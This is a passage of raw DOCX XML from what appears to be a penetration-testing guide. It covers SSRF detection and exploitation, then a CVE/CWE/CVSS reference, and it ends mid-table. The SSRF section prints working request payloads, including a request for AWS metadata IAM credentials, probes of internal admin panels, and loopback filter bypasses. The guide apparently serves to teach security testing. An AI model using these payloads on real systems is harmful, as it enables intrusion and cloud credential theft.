        <w:t xml:space="preserve">Perform obvious attacks (SQLi, brute force) and check if application/WAF responds with blocks or alerts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Check if failed login attempts are logged — request /admin/logs or check if admin UI shows your attempts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Test if application sends no response change to repeated failed auth (no account lockout) — flag as CWE-307</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Verify that error messages expose stack traces, server paths, database errors — information leakage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A10:2021 — Server-Side Request Forgery (SSRF)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SSRF forces the server to make HTTP requests on behalf of the attacker — used to reach internal services, cloud metadata endpoints, and internal admin panels not exposed to the internet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ SSRF Detection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Look for URL parameters in any request: url=, redirect=, src=, path=, fetch=, dest=, href=, uri=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Also check: webhook URLs, image upload-by-URL, document converters, PDF generators</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ SSRF Exploitation with Burp Collaborator</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="0" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="446688"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # Basic SSRF — test if server makes outbound requests:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  GET /fetch?url=http://YOUR_COLLAB.burpcollaborator.net</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="0" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="446688"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # Internal service enumeration:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  GET /fetch?url=http://169.254.169.254/latest/meta-data/  (AWS metadata)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  GET /fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  GET /fetch?url=http://192.168.1.1/admin  (internal router)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  GET /fetch?url=http://localhost:8080/manager/html  (Tomcat manager)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ SSRF Filter Bypasses</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  http://2130706433  (decimal encoding of 127.0.0.1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  http://0x7F000001   (hex encoding of 127.0.0.1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  http://127.1        (shortened loopback)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  http://spoofed.attacker.com → DNS resolves to 127.0.0.1</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CWE: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CWE-918 (SSRF), CWE-610 (Externally Controlled Reference to External Resource)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE Examples: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2019-8451 (Atlassian Jira SSRF), CVE-2021-26855 (Exchange ProxyLogon SSRF+RCE)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pageBreakBefore/>
        <w:spacing w:before="0" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6B35"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">SECTION 4: CVE, CWE &amp; CVSS — COMPLETE REFERENCE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="3B6EFF" w:sz="3" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="320" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF8C42"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">  4.1  CVE vs CWE — The Critical Distinction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Understanding the difference between CVE and CWE is fundamental to professional pentest reporting and accurately communicating findings to clients.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Attribute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="73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CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Full Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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Common Vulnerabilities &amp; Exposures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Managed By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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MITRE / NVD (National Vulnerability Database)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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What It Describes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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A specific vulnerability in a specific product at a specific version</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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Instance-level: THIS product, THIS version, THIS bug</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Identifier Format</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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CVE-YEAR-NUMBER  (e.g. CVE-2021-44228)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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CVE-2021-44228 = Log4j RCE in versions 2.0-2.14.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Used For</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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Patching guidance, version checking, CVSSscoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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In Reports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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Reference the specific flaw your finding relates to</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Key Rule: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">One CWE can have thousands of CVEs. CVE-2021-44228 (Log4Shell) maps to CWE-917 (Expression Language Injection). Every CVE has at least one parent CWE.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4.2  CVSS — Common Vulnerability Scoring System</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS (v3.1 is current standard) provides a standardised method for rating the severity of vulnerabilities on a 0.0–10.0 scale. Every professional pentest report must include CVSS scores for each finding. CVSS is composed of three metric groups.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ CVSS v3.1 Base Score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Metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="320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Values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="366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Notes</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Attack Vector (AV)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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N=Network, A=Adjacent, L=Local, P=Physical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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N &gt; A &gt; L &gt; P (Network=highest impact)</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Attack Complexity (AC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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L=Low, H=High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Low = reproducible without special conditions</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Privileges Required (PR)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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N=None, L=Low, H=High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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None = highest impact score</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User Interaction (UI)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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N=None, R=Required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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None = higher score (no victim needed)</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Scope (S)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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U=Unchanged, C=Changed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Changed = attack impacts components beyond the vulnerable one</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Confidentiality (C)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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N=None, L=Low, H=High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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H = complete info disclosure</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Integrity (I)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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N=None, L=Low, H=High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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H = complete data corruption/modification</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Availability (A)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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N=None, L=Low, H=High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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H = total service disruption</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ CVSS Score Ranges &amp; Severity Ratings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A0A0F" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF2D55"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> [CRITICAL] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  9.0 – 10.0  →  Immediate remediation required. Often RCE, full system compromise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A120A" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6B35"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> [HIGH] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  7.0 – 8.9   →  High priority. Significant data exposure or partial system compromise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="0A1410" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> [MEDIUM] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  4.0 – 6.9   →  Address in next patch cycle. Requires specific conditions to exploit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="0A0F1A" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="39D98A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> [LOW] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  0.1 – 3.9   →  Best-effort remediation. Limited impact or very difficult to exploit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="06101A" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00A6FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> [INFO] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  0.0         →  Informational. No direct impact but worth noting for defence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ How to Calculate a CVSS Score — Worked Example</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding: Unauthenticated SQL Injection in /api/search endpoint, returns database contents.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Metric</w:t>
            </w:r>
          </w:p>
